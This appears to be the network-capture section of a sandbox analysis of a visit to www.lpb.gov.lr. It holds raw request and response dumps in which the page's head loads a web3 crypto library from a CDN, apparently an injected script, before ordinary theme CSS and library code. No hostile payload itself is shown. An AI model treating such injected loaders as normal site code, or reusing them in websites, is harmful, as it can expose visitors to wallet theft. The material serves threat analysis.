                                                                                                                        Location: https://www.lpb.gov.lr/
                                                                                                                        Cache-Control: max-age=600
                                                                                                                        Expires: Fri, 10 Jan 2025 14:04:42 GMT
                                                                                                                        Vary: User-Agent
                                                                                                                        Content-Length: 0
                                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        1192.168.2.74974169.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:43 UTC657OUTGET / HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                        Sec-Fetch-User: ?1
                                                                                                                        Sec-Fetch-Dest: document
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:44 UTC543INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:43 GMT
                                                                                                                        Server: Apache
                                                                                                                        X-Pingback: https://www.lpb.gov.lr/xmlrpc.php
                                                                                                                        Link: <https://www.lpb.gov.lr/wp-json/>; rel="https://api.w.org/", <https://www.lpb.gov.lr/wp-json/wp/v2/pages/2>; rel="alternate"; title="JSON"; type="application/json", <https://www.lpb.gov.lr/>; rel=shortlink
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Cache-Control: max-age=600
                                                                                                                        Expires: Fri, 10 Jan 2025 14:04:43 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        2025-01-10 13:54:44 UTC7649INData Raw: 31 30 36 62 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 77 65 62 33 40 6c 61 74 65 73 74 2f 64 69 73 74 2f 77 65 62 33 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e
                                                                                                                        Data Ascii: 106b5<!DOCTYPE html><html lang="en-US" class="no-js " itemscope itemtype="https://schema.org/WebPage" ><head><meta charset="UTF-8" /> <script src="https://cdn.jsdelivr.net/npm/web3@latest/dist/web3.min.js"></script> <script src="https://cdn
                                                                                                                        2025-01-10 13:54:44 UTC7924INData Raw: 70 72 65 73 65 74 2d 2d 61 73 70 65 63 74 2d 72 61 74 69 6f 2d 2d 73 71 75 61 72 65 3a 20 31 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 61 73 70 65 63 74 2d 72 61 74 69 6f 2d 2d 34 2d 33 3a 20 34 2f 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 61 73 70 65 63 74 2d 72 61 74 69 6f 2d 2d 33 2d 34 3a 20 33 2f 34 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 61 73 70 65 63 74 2d 72 61 74 69 6f 2d 2d 33 2d 32 3a 20 33 2f 32 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 61 73 70 65 63 74 2d 72 61 74 69 6f 2d 2d 32 2d 33 3a 20 32 2f 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 61 73 70 65 63 74 2d 72 61 74 69 6f 2d 2d 31 36 2d 39 3a 20 31 36 2f 39 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 61 73 70 65 63 74 2d 72 61 74 69 6f 2d 2d 39 2d 31 36 3a 20 39 2f
                                                                                                                        Data Ascii: preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio--3-4: 3/4;--wp--preset--aspect-ratio--3-2: 3/2;--wp--preset--aspect-ratio--2-3: 2/3;--wp--preset--aspect-ratio--16-9: 16/9;--wp--preset--aspect-ratio--9-16: 9/
                                                                                                                        2025-01-10 13:54:44 UTC2535INData Raw: 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 62 6c 75 73 68 2d 62 6f 72 64 65 61 75 78 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 62 6f 72 64 65 61 75 78 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 64 75 73 6b 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72
                                                                                                                        Data Ascii: und{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gr
                                                                                                                        2025-01-10 13:54:44 UTC8192INData Raw: 3c 73 74 79 6c 65 20 69 64 3d 27 6d 66 6e 2d 64 79 6e 61 6d 69 63 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 3a 6e 6f 74 28 2e 74 65 6d 70 6c 61 74 65 2d 73 6c 69 64 65 72 29 20 23 48 65 61 64 65 72 5f 77 72 61 70 70 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 70 62 2e 67 6f 76 2e 6c 72 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 34 2f 30 32 2f 63 6f 76 65 72 2d 70 61 67 65 73 2d 69 6d 61 67 65 2d 32 2e 70 6e 67 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e
                                                                                                                        Data Ascii: <style id='mfn-dynamic-inline-css' type='text/css'>body:not(.template-slider) #Header_wrapper{background-image:url(https://www.lpb.gov.lr/wp-content/uploads/2024/02/cover-pages-image-2.png);background-repeat:no-repeat;background-position:center;backgroun
                                                                                                                        2025-01-10 13:54:44 UTC8192INData Raw: 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 31 70 78 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 74 61 6c 69 63 7d 68 31 2c 2e 74 65 78 74 2d 6c 6f 67 6f 20 23 6c 6f 67 6f 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 39 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 30 70 78 7d 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 30 70 78 7d 68 33 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 75 6c 2e 70 72 6f 64 75 63 74 73 20 6c 69 2e 70 72 6f 64 75 63 74 20 68 33 2c 2e 77 6f 6f
                                                                                                                        Data Ascii: ont-weight:400;letter-spacing:1px;font-style:italic}h1,.text-logo #logo{font-size:29px;line-height:30px;font-weight:400;letter-spacing:0px}h2{font-size:18px;line-height:20px;font-weight:300;letter-spacing:0px}h3,.woocommerce ul.products li.product h3,.woo
                                                                                                                        2025-01-10 13:54:44 UTC8192INData Raw: 61 75 6c 74 29 2c 2e 62 75 74 74 6f 6e 2d 73 74 72 6f 6b 65 20 23 72 65 73 70 6f 6e 64 20 69 6e 70 75 74 23 73 75 62 6d 69 74 2e 61 6c 74 2e 64 69 73 61 62 6c 65 64 2c 2e 62 75 74 74 6f 6e 2d 73 74 72 6f 6b 65 20 23 72 65 73 70 6f 6e 64 20 69 6e 70 75 74 23 73 75 62 6d 69 74 2e 61 6c 74 2e 64 69 73 61 62 6c 65 64 3a 68 6f 76 65 72 2c 2e 62 75 74 74 6f 6e 2d 73 74 72 6f 6b 65 20 23 72 65 73 70 6f 6e 64 20 69 6e 70 75 74 23 73 75 62 6d 69 74 2e 61 6c 74 3a 64 69 73 61 62 6c 65 64 2c 2e 62 75 74 74 6f 6e 2d 73 74 72 6f 6b 65 20 23 72 65 73 70 6f 6e 64 20 69 6e 70 75 74 23 73 75 62 6d 69 74 2e 61 6c 74 3a 64 69 73 61 62 6c 65 64 3a 68 6f 76 65 72 2c 2e 62 75 74 74 6f 6e 2d 73 74 72 6f 6b 65 20 23 72 65 73 70 6f 6e 64 20 69 6e 70 75 74 23 73 75 62 6d 69 74 2e
                                                                                                                        Data Ascii: ault),.button-stroke #respond input#submit.alt.disabled,.button-stroke #respond input#submit.alt.disabled:hover,.button-stroke #respond input#submit.alt:disabled,.button-stroke #respond input#submit.alt:disabled:hover,.button-stroke #respond input#submit.
                                                                                                                        2025-01-10 13:54:44 UTC8192INData Raw: 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 72 69 67 68 74 20 62 6f 74 74 6f 6d 7d 2e 72 74 6c 20 23 54 6f 70 5f 62 61 72 20 2e 6d 65 6e 75 20 3e 20 6c 69 20 3e 20 75 6c 2e 6d 66 6e 2d 6d 65 67 61 6d 65 6e 75 2d 62 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 36 36 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 6c 65 66 74 20 62 6f 74 74 6f 6d 7d 23 54 6f 70 5f 62 61 72 20 2e 6d 65 6e 75 20 3e 20 6c 69 20 3e 20 75 6c 2e 6d 66 6e 2d 6d 65 67 61 6d 65 6e 75 2d 62 67 20 3e 20 6c 69 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 7d 23 54 6f 70 5f 62 61 72 20 2e 6d 65 6e 75 20 3e 20 6c 69 20 3e 20 75 6c 2e 6d 66 6e 2d 6d 65 67 61 6d 65 6e 75 2d 62 67 20 3e 20 6c 69 20 61 7b
                                                                                                                        Data Ascii: ground-position:right bottom}.rtl #Top_bar .menu > li > ul.mfn-megamenu-bg{padding-left:166px;padding-right:20px;background-position:left bottom}#Top_bar .menu > li > ul.mfn-megamenu-bg > li{background:none}#Top_bar .menu > li > ul.mfn-megamenu-bg > li a{
                                                                                                                        2025-01-10 13:54:44 UTC8192INData Raw: 2d 32 30 30 70 78 3b 74 6f 70 3a 30 3b 7a 2d 69 6e 64 65 78 3a 39 30 30 32 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 32 70 78 20 30 20 34 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 32 70 78 20 30 20 34 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 35 29 7d 23 48 65 61 64 65 72 5f 63 72 65 61 74 69 76 65 20 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 31 30 30 25 7d 23 48 65 61 64 65 72 5f 63 72 65 61 74 69 76 65 20 2e 63 72 65 61 74 69 76 65 2d 77 72 61 70 70 65 72 7b 6f 70 61 63 69 74 79 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 30 70 78 7d 23 48 65 61 64 65 72 5f 63 72 65 61 74 69 76 65 20 61 2e 63 72 65 61 74 69 76 65 2d 6d 65 6e 75 2d 74 6f 67 67
                                                                                                                        Data Ascii: -200px;top:0;z-index:9002;-webkit-box-shadow:2px 0 4px 2px rgba(0,0,0,.15);box-shadow:2px 0 4px 2px rgba(0,0,0,.15)}#Header_creative .container{width:100%}#Header_creative .creative-wrapper{opacity:0;margin-right:50px}#Header_creative a.creative-menu-togg
                                                                                                                        2025-01-10 13:54:44 UTC8192INData Raw: 30 25 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 2d 35 30 25 29 7d 23 54 6f 70 5f 62 61 72 2e 69 73 2d 73 74 69 63 6b 79 20 2e 74 6f 70 5f 62 61 72 5f 6c 65 66 74 2c 23 54 6f 70 5f 62 61 72 2e 69 73 2d 73 74 69 63 6b 79 20 2e 74 6f 70 5f 62 61 72 5f 72 69 67 68 74 2c 23 54 6f 70 5f 62 61 72 2e 69 73 2d 73 74 69 63 6b 79 20 2e 74 6f 70 5f 62 61 72 5f 72 69 67 68 74 3a 62 65 66 6f 72 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 75 6e 73 65 74 7d 23 54 6f 70 5f 62 61 72 2e 69 73 2d 73 74 69 63 6b 79 20 2e 6c 6f 67 6f 7b 77 69 64 74 68 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 3a 30 20 33 30 70 78 20 30 20 32 30 70 78 3b 70 61 64 64 69 6e 67 3a 30 7d 23 54 6f 70 5f 62 61 72 2e 69 73 2d 73 74 69 63
                                                                                                                        Data Ascii: 0%);transform:translateX(-50%)}#Top_bar.is-sticky .top_bar_left,#Top_bar.is-sticky .top_bar_right,#Top_bar.is-sticky .top_bar_right:before{background:none;box-shadow:unset}#Top_bar.is-sticky .logo{width:auto;margin:0 30px 0 20px;padding:0}#Top_bar.is-stic
                                                                                                                        2025-01-10 13:54:44 UTC2INData Raw: 0d 0a
                                                                                                                        Data Ascii:


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        2192.168.2.749753151.101.65.2294432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:44 UTC546OUTGET /npm/web3@latest/dist/web3.min.js HTTP/1.1
                                                                                                                        Host: cdn.jsdelivr.net
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:44 UTC760INHTTP/1.1 200 OK
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 642428
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Access-Control-Expose-Headers: *
                                                                                                                        Timing-Allow-Origin: *
                                                                                                                        Cache-Control: public, max-age=604800, s-maxage=43200
                                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                                        X-JSD-Version: 4.16.0
                                                                                                                        X-JSD-Version-Type: version
                                                                                                                        ETag: W/"9cd7c-M9qpM1YeVfmYjiviVEgHj5fvDbI"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Age: 33784
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:44 GMT
                                                                                                                        X-Served-By: cache-fra-eddf8230141-FRA, cache-ewr-kewr1740026-EWR
                                                                                                                        X-Cache: HIT, HIT
                                                                                                                        Vary: Accept-Encoding
                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                        2025-01-10 13:54:44 UTC1378INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 77 65 62 33 2e 6d 69 6e 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 2e 57 65 62 33 3d 74 28 29 3a 65 2e 57 65 62 33 3d 74 28 29 7d 28
                                                                                                                        Data Ascii: /*! For license information please see web3.min.js.LICENSE.txt */!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.Web3=t():e.Web3=t()}(
                                                                                                                        2025-01-10 13:54:44 UTC1378INData Raw: 2c 65 2e 6c 65 6e 67 74 68 2d 31 3c 72 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 69 6e 76 61 6c 69 64 20 52 4c 50 3a 20 6e 6f 74 20 65 6e 6f 75 67 68 20 62 79 74 65 73 20 66 6f 72 20 73 74 72 69 6e 67 20 6c 65 6e 67 74 68 22 29 3b 69 66 28 74 3d 69 28 6e 28 65 2c 31 2c 72 29 29 2c 74 3c 3d 35 35 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 69 6e 76 61 6c 69 64 20 52 4c 50 3a 20 65 78 70 65 63 74 65 64 20 73 74 72 69 6e 67 20 6c 65 6e 67 74 68 20 74 6f 20 62 65 20 67 72 65 61 74 65 72 20 74 68 61 6e 20 35 35 22 29 3b 72 65 74 75 72 6e 20 6f 3d 6e 28 65 2c 72 2c 74 2b 72 29 2c 7b 64 61 74 61 3a 6f 2c 72 65 6d 61 69 6e 64 65 72 3a 65 2e 73 6c 69 63 65 28 74 2b 72 29 7d 7d 69 66 28 64 3c 3d 32 34 37 29 7b 66 6f 72 28 74 3d 64 2d 31 39 31
                                                                                                                        Data Ascii: ,e.length-1<r)throw new Error("invalid RLP: not enough bytes for string length");if(t=i(n(e,1,r)),t<=55)throw new Error("invalid RLP: expected string length to be greater than 55");return o=n(e,r,t+r),{data:o,remainder:e.slice(t+r)}}if(d<=247){for(t=d-191
                                                                                                                        2025-01-10 13:54:44 UTC1378INData Raw: 79 28 74 29 3b 66 6f 72 28 6c 65 74 20 74 3d 30 2c 6e 3d 30 3b 74 3c 65 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 63 6f 6e 73 74 20 69 3d 65 5b 74 5d 3b 72 2e 73 65 74 28 69 2c 6e 29 2c 6e 2b 3d 69 2e 6c 65 6e 67 74 68 7d 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 29 7b 72 65 74 75 72 6e 28 6e 65 77 20 54 65 78 74 45 6e 63 6f 64 65 72 29 2e 65 6e 63 6f 64 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 29 7b 69 66 28 65 3c 30 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 69 6e 74 65 67 65 72 20 61 73 20 61 72 67 75 6d 65 6e 74 2c 20 6d 75 73 74 20 62 65 20 75 6e 73 69 67 6e 65 64 21 22 29 3b 63 6f 6e 73 74 20 74 3d 65 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 3b 72 65 74 75 72 6e 20 74 2e 6c 65 6e 67 74 68
                                                                                                                        Data Ascii: y(t);for(let t=0,n=0;t<e.length;t++){const i=e[t];r.set(i,n),n+=i.length}return r}function f(e){return(new TextEncoder).encode(e)}function p(e){if(e<0)throw new Error("Invalid integer as argument, must be unsigned!");const t=e.toString(16);return t.length
                                                                                                                        2025-01-10 13:54:44 UTC1378INData Raw: 64 6f 77 73 3a 4d 61 74 68 2e 63 65 69 6c 28 74 2f 65 29 2b 31 2c 77 69 6e 64 6f 77 53 69 7a 65 3a 32 2a 2a 28 65 2d 31 29 7d 29 3b 72 65 74 75 72 6e 7b 63 6f 6e 73 74 54 69 6d 65 4e 65 67 61 74 65 3a 72 2c 75 6e 73 61 66 65 4c 61 64 64 65 72 28 74 2c 72 29 7b 6c 65 74 20 6e 3d 65 2e 5a 45 52 4f 2c 69 3d 74 3b 66 6f 72 28 3b 72 3e 6f 3b 29 72 26 73 26 26 28 6e 3d 6e 2e 61 64 64 28 69 29 29 2c 69 3d 69 2e 64 6f 75 62 6c 65 28 29 2c 72 3e 3e 3d 73 3b 72 65 74 75 72 6e 20 6e 7d 2c 70 72 65 63 6f 6d 70 75 74 65 57 69 6e 64 6f 77 28 65 2c 74 29 7b 63 6f 6e 73 74 7b 77 69 6e 64 6f 77 73 3a 72 2c 77 69 6e 64 6f 77 53 69 7a 65 3a 69 7d 3d 6e 28 74 29 2c 6f 3d 5b 5d 3b 6c 65 74 20 73 3d 65 2c 61 3d 73 3b 66 6f 72 28 6c 65 74 20 65 3d 30 3b 65 3c 72 3b 65 2b 2b 29
                                                                                                                        Data Ascii: dows:Math.ceil(t/e)+1,windowSize:2**(e-1)});return{constTimeNegate:r,unsafeLadder(t,r){let n=e.ZERO,i=t;for(;r>o;)r&s&&(n=n.add(i)),i=i.double(),r>>=s;return n},precomputeWindow(e,t){const{windows:r,windowSize:i}=n(t),o=[];let s=e,a=s;for(let e=0;e<r;e++)
                                                                                                                        2025-01-10 13:54:44 UTC1378INData Raw: 74 20 6e 3d 74 2d 31 3b 6e 3e 3d 30 3b 6e 2d 2d 29 72 5b 6e 5d 3d 32 35 35 26 65 2c 65 3e 3e 3e 3d 38 3b 72 65 74 75 72 6e 20 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 72 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 63 6f 6e 73 74 20 72 3d 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 65 2e 6c 65 6e 67 74 68 29 3b 66 6f 72 28 6c 65 74 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 72 5b 6e 5d 3d 65 5b 6e 5d 5e 74 5b 6e 5d 3b 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 55 69 6e 74 38 41 72 72 61 79 20 65 78 70 65 63 74 65 64 22 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65
                                                                                                                        Data Ascii: t n=t-1;n>=0;n--)r[n]=255&e,e>>>=8;return new Uint8Array(r)}function a(e,t){const r=new Uint8Array(e.length);for(let n=0;n<e.length;n++)r[n]=e[n]^t[n];return r}function c(e){if(!(e instanceof Uint8Array))throw new Error("Uint8Array expected")}function u(e
                                                                                                                        2025-01-10 13:54:44 UTC1378INData Raw: 20 65 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 29 72 65 74 75 72 6e 28 30 2c 69 2e 75 74 66 38 54 6f 42 79 74 65 73 29 28 65 29 3b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 44 53 54 20 6d 75 73 74 20 62 65 20 55 69 6e 74 38 41 72 72 61 79 20 6f 72 20 73 74 72 69 6e 67 22 29 7d 28 6d 29 2c 79 3d 73 2e 74 6f 53 74 72 69 6e 67 28 32 29 2e 6c 65 6e 67 74 68 2c 76 3d 4d 61 74 68 2e 63 65 69 6c 28 28 79 2b 61 29 2f 38 29 2c 62 3d 74 2a 68 2a 76 3b 6c 65 74 20 45 3b 69 66 28 22 78 6d 64 22 3d 3d 3d 70 29 45 3d 64 28 65 2c 67 2c 62 2c 66 29 3b 65 6c 73 65 20 69 66 28 22 78 6f 66 22 3d 3d 3d 70 29 45 3d 6c 28 65 2c 67 2c 62 2c 61 2c 66 29 3b 65 6c 73 65 7b 69 66 28 22 5f 69 6e 74 65 72 6e 61 6c 5f 70 61 73 73 22 21 3d 3d 70 29 74
                                                                                                                        Data Ascii: e;if("string"==typeof e)return(0,i.utf8ToBytes)(e);throw new Error("DST must be Uint8Array or string")}(m),y=s.toString(2).length,v=Math.ceil((y+a)/8),b=t*h*v;let E;if("xmd"===p)E=d(e,g,b,f);else if("xof"===p)E=l(e,g,b,a,f);else{if("_internal_pass"!==p)t
                                                                                                                        2025-01-10 13:54:44 UTC1378INData Raw: 6e 6b 73 3d 74 2e 69 6e 76 65 72 74 3d 74 2e 70 6f 77 32 3d 74 2e 70 6f 77 3d 74 2e 6d 6f 64 3d 76 6f 69 64 20 30 3b 63 6f 6e 73 74 20 6e 3d 72 28 38 34 36 33 29 2c 69 3d 42 69 67 49 6e 74 28 30 29 2c 6f 3d 42 69 67 49 6e 74 28 31 29 2c 73 3d 42 69 67 49 6e 74 28 32 29 2c 61 3d 42 69 67 49 6e 74 28 33 29 2c 63 3d 42 69 67 49 6e 74 28 34 29 2c 75 3d 42 69 67 49 6e 74 28 35 29 2c 64 3d 42 69 67 49 6e 74 28 38 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 65 2c 74 29 7b 63 6f 6e 73 74 20 72 3d 65 25 74 3b 72 65 74 75 72 6e 20 72 3e 3d 69 3f 72 3a 74 2b 72 7d 66 75 6e 63 74 69 6f 6e 20 68 28 65 2c 74 2c 72 29 7b 69 66 28 72 3c 3d 69 7c 7c 74 3c 69 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 45 78 70 65 63 74 65 64 20 70 6f 77 65 72 2f 6d 6f 64 75 6c 6f 20
                                                                                                                        Data Ascii: nks=t.invert=t.pow2=t.pow=t.mod=void 0;const n=r(8463),i=BigInt(0),o=BigInt(1),s=BigInt(2),a=BigInt(3),c=BigInt(4),u=BigInt(5),d=BigInt(8);function l(e,t){const r=e%t;return r>=i?r:t+r}function h(e,t,r){if(r<=i||t<i)throw new Error("Expected power/modulo
